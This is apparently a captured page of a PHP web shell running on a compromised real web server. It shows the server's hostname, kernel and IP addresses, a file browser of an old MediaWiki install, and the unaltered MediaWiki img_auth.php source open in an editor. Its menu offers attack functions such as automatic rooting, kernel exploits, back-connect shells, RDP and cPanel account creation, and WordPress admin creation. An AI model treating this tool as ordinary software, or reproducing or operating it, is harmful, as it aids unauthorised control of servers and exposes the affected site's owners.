Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
discover /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
cgi1-bin
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
maintenance
[ DIR ]
drwxr-xr-x
mediawiki-1.19.2
[ DIR ]
drwxr-xr-x
mw-config
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
serialized
[ DIR ]
drwxr-xr-x
skins
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitreview
95
B
-rw-r--r--
COPYING
17.46
KB
-rw-r--r--
CREDITS
2.99
KB
-rw-r--r--
FAQ
76
B
-rw-r--r--
HISTORY
508.59
KB
-rw-r--r--
INSTALL
3.29
KB
-rw-r--r--
LocalSettings.php
4.49
KB
-rw-r--r--
README
4.02
KB
-rw-r--r--
RELEASE-NOTES-1.19
25.04
KB
-rw-r--r--
StartProfiler.sample
408
B
-rw-r--r--
UPGRADE
11.3
KB
-rw-r--r--
api.php
4.75
KB
-rw-r--r--
api.php5
25
B
-rw-r--r--
img_auth.php
5.1
KB
-rw-r--r--
img_auth.php5
31
B
-rw-r--r--
index.php
2.31
KB
-rw-r--r--
index.php5
29
B
-rw-r--r--
load.php
1.78
KB
-rw-r--r--
load.php5
27
B
-rw-r--r--
mediawiki-1.19.2.tar.gz
17.42
MB
-rw-r--r--
opensearch_desc.php
3.01
KB
-rw-r--r--
opensearch_desc.php5
39
B
-rw-r--r--
profileinfo.php
9.21
KB
-rw-r--r--
redirect.php
510
B
-rw-r--r--
redirect.php5
31
B
-rw-r--r--
redirect.phtml
89
B
-rw-r--r--
testindex.html
352
B
-rw-r--r--
thumb.php
9.43
KB
-rw-r--r--
thumb.php5
29
B
-rw-r--r--
thumb_handler.php
229
B
-rw-r--r--
thumb_handler.php5
37
B
-rw-r--r--
wiki.phtml
86
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : img_auth.php
<?php /** * Image authorisation script * * To use this, see http://www.mediawiki.org/wiki/Manual:Image_Authorization * * - Set $wgUploadDirectory to a non-public directory (not web accessible) * - Set $wgUploadPath to point to this file * * Optional Parameters * * - Set $wgImgAuthDetails = true if you want the reason the access was denied messages to * be displayed instead of just the 403 error (doesn't work on IE anyway), * otherwise it will only appear in error logs * - Set $wgImgAuthPublicTest false if you don't want to just check and see if all are public * must be set to false if using specific restrictions such as LockDown or NSFileRepo * * For security reasons, you usually don't want your user to know *why* access was denied, * just that it was. If you want to change this, you can set $wgImgAuthDetails to 'true' * in localsettings.php and it will give the user the reason why access was denied. * * Your server needs to support PATH_INFO; CGI-based configurations usually don't. * * @file * **/ define( 'MW_NO_OUTPUT_COMPRESSION', 1 ); if ( isset( $_SERVER['MW_COMPILED'] ) ) { require ( 'phase3/includes/WebStart.php' ); } else { require ( dirname( __FILE__ ) . '/includes/WebStart.php' ); } wfProfileIn( 'img_auth.php' ); # Set action base paths so that WebRequest::getPathInfo() # recognizes the "X" as the 'title' in ../image_auth/X urls. $wgArticlePath = false; # Don't let a "/*" article path clober our action path $wgActionPaths = array( "$wgUploadPath/" ); wfImageAuthMain(); wfLogProfilingData(); function wfImageAuthMain() { global $wgImgAuthPublicTest, $wgRequest, $wgUploadDirectory; // See if this is a public Wiki (no protections). if ( $wgImgAuthPublicTest && in_array( 'read', User::getGroupPermissions( array( '*' ) ), true ) ) { // This is a public wiki, so disable this script (for private wikis only) wfForbidden( 'img-auth-accessdenied', 'img-auth-public' ); return; } // Get the requested file path (source file or thumbnail) $matches = WebRequest::getPathInfo(); if ( !isset( $matches['title'] ) ) { wfForbidden( 'img-auth-accessdenied', 'img-auth-nopathinfo' ); return; } $path = $matches['title']; if ( $path && $path[0] !== '/' ) { // Make sure $path has a leading / $path = "/" . $path; } // Check for bug 28235: QUERY_STRING overriding the correct extension $whitelist = array(); $dotPos = strrpos( $path, '.' ); if ( $dotPos !== false ) { $whitelist[] = substr( $path, $dotPos + 1 ); } if ( !$wgRequest->checkUrlExtension( $whitelist ) ) { return; } // Get the local file repository $repo = RepoGroup::singleton()->getRepo( 'local' ); // Get the full file storage path and extract the source file name. // (e.g. 120px-Foo.png => Foo.png or page2-120px-Foo.png => Foo.png). // This only applies to thumbnails, and all thumbnails should // be under a folder that has the source file name. if ( strpos( $path, '/thumb/' ) === 0 ) { $name = wfBaseName( dirname( $path ) ); // file is a thumbnail $filename = $repo->getZonePath( 'thumb' ) . substr( $path, 6 ); // strip "/thumb" } else { $name = wfBaseName( $path ); // file is a source file $filename = $repo->getZonePath( 'public' ) . $path; } // Check to see if the file exists if ( !$repo->fileExists( $filename, FileRepo::FILES_ONLY ) ) { wfForbidden( 'img-auth-accessdenied','img-auth-nofile', $filename ); return; } $title = Title::makeTitleSafe( NS_FILE, $name ); if ( !$title instanceof Title ) { // files have valid titles wfForbidden( 'img-auth-accessdenied', 'img-auth-badtitle', $name ); return; } // Run hook for extension authorization plugins if ( !wfRunHooks( 'ImgAuthBeforeStream', array( &$title, &$path, &$name, &$result ) ) ) { wfForbidden( $result[0], $result[1], array_slice( $result, 2 ) ); return; } // Check user authorization for this title // Checks Whitelist too if ( !$title->userCan( 'read' ) ) { wfForbidden( 'img-auth-accessdenied', 'img-auth-noread', $name ); return; } // Stream the requested file wfDebugLog( 'img_auth', "Streaming `".$filename."`." ); $repo->streamFile( $filename, array( 'Cache-Control: private', 'Vary: Cookie' ) ); } /** * Issue a standard HTTP 403 Forbidden header ($msg1-a message index, not a message) and an * error message ($msg2, also a message index), (both required) then end the script * subsequent arguments to $msg2 will be passed as parameters only for replacing in $msg2 * @param $msg1 * @param $msg2 */ function wfForbidden( $msg1, $msg2 ) { global $wgImgAuthDetails; $args = func_get_args(); array_shift( $args ); array_shift( $args ); $msgHdr = htmlspecialchars( wfMsg( $msg1 ) ); $detailMsgKey = $wgImgAuthDetails ? $msg2 : 'badaccess-group0'; $detailMsg = htmlspecialchars( wfMsg( $detailMsgKey, $args ) ); wfDebugLog( 'img_auth', "wfForbidden Hdr:" . wfMsgExt( $msg1, array( 'language' => 'en' ) ). " Msg: ". wfMsgExt( $msg2, array( 'language' => 'en' ), $args ) ); header( 'HTTP/1.0 403 Forbidden' ); header( 'Cache-Control: no-cache' ); header( 'Content-Type: text/html; charset=utf-8' ); echo <<<ENDS <html> <body> <h1>$msgHdr</h1> <p>$detailMsg</p> </body> </html> ENDS; }
Close
